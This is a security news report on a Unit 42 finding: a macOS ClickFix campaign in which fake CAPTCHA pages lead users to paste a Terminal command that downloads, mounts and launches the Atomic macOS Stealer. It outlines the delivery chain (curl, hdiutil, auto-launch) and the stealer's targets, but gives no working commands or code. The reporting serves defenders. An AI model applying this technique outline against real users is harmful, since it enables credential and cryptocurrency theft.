Security researchers at Palo Alto Networks Unit 42 have uncovered a new macOS-focused ClickFix campaign that uses social engineering and native system tools to silently install the Atomic macOS Stealer (AMOS) infostealer. The attack relies on fake CAPTCHA pages that instruct users to open Terminal and paste a command, effectively tricking victims into executing malware under the guise of a verification step.
Once the command is executed, the malware is downloaded from an attacker-controlled server as a disk image (DMG) file using curl, then silently mounted using macOS’s built-in hdiutil utility. The script searches the mounted volume for application bundles or installers and automatically launches the malicious payload without requiring user interaction through Finder or standard macOS security prompts.
This ClickFix variant represents an evolution of earlier social engineering techniques by removing the need for manual file execution. Instead of relying on users opening downloaded files, the attack chain fully automates execution through Terminal commands. Researchers note that this significantly reduces friction for attackers and increases the likelihood of successful infection, especially among users unfamiliar with macOS command-line operations.
The payload delivered in this campaign belongs to the Atomic macOS Stealer family, a well-known infostealer designed to extract sensitive data from infected systems. It targets a wide range of information, including browser credentials, cookies, autofill data, cryptocurrency wallet files, Apple Keychain data, messaging app content, and locally stored documents. It also specifically targets multiple browsers across Chromium and Firefox-based ecosystems, as well as major cryptocurrency wallet applications.
In addition to data theft, the malware has been observed replacing legitimate installations of hardware wallet software such as Ledger Live and Trezor Suite with malicious versions to facilitate cryptocurrency theft. Stolen data is compressed into archives and exfiltrated to attacker-controlled servers, enabling large-scale credential harvesting and financial fraud.
The campaign highlights the growing abuse of macOS-native tools and user trust in system-level instructions. Security researchers warn that any prompt instructing users to execute Terminal commands as part of CAPTCHA verification or troubleshooting should be treated as highly suspicious, as legitimate services do not require such actions.
